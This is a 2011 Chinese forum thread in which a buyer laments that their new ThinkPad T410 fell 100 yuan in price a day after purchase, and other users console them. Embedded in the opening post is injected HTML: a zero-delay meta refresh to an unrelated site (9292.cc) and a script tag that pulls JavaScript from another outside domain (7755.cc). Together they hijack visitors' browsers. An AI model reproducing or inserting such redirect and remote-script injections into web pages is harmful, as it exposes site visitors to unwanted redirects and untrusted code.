开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

悲剧了,刚买了T410-PM9就降价了

关闭 [复制链接]
昨天刚入手的T410-PM9,还没有顾上发帖子就发现今天价格降了100,真是郁闷啊,降得也太快了,早知道再等等了。:(
<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

princeliu 发表于 2011-3-7 11:17
你看看X200卖多少钱了,你要当时买你现在不得疯啊,所以电子产品这个东西就跟潮流服饰一样,看你想不想跟风 ...

X200用到现在怎么也1、2年了,不降才不正常呢,我这个昨天买的今天就降了,速度也太快了,心理不平衡啊,看来不是高性价比的机子啊
你都中排排站了 已经赚了
知足者常乐
正常降价而已,所有机器基本平均每周都有50左右的降幅
买完了,就别看价格了~~~
admini 发表于 2011-3-7 14:13

对头,买了,就不要再看价格了,过两周在看
正常而已,楼主放宽心,只要机子好,多花100也没啥
w88463934 发表于 2011-3-7 14:32
对头,买了,就不要再看价格了,过两周在看

不对,你应该盼着,你刚买的机器赶紧断货~~~
admini 发表于 2011-3-7 14:13

顶mini
回复 admini 的帖子

mini绝对是。。。。。后面自己意会

回复 十字殇 的帖子

也只能这么想了,幸亏中排排站了。当时一看中了还高兴的不得了,还没有来得及写点啥呢就看到降价了。当然了,只要是我的机子质量好,这点小钱也不算啥,就是多少有些不舒服。拿回来还没有仔细试用呢,只是机子上用来遮挡无线和蓝牙指示灯的纸贴得有些歪,未免美中不足,抽空好好试用一下,不过估计最近都没有时间呢。
回复 ibmt 的帖子

可以拿来我帮你试  我有的是时间
w88463934 发表于 2011-3-7 15:39
回复 admini 的帖子

mini绝对是。。。。。后面自己意会

你省略多少字儿吧。。。
你要是等到降价再买,也许就买不到了
这个要知足啊。。。
早买早享受@@
楼上的观点也很正确~~
你都不错啦,我今年过年买的RD6,刚买完就中了排排站,年后马上又降了100,你说我不比你郁闷那
这个确实很郁闷。。。
admini 发表于 2011-3-7 15:14
不对,你应该盼着,你刚买的机器赶紧断货~~~

不错,俺就是买了最后一台pl2,没有价格来直接对比了。
这个正常,电子产品
我还算好,本来的预算要买W510 那个I5的,盯了一两个月一分钱没降,只好买另外的T410了,买完一个月,W510马上降价1000元,肠子都悔青了~
心理要平衡!
哈哈 等中了排排站再买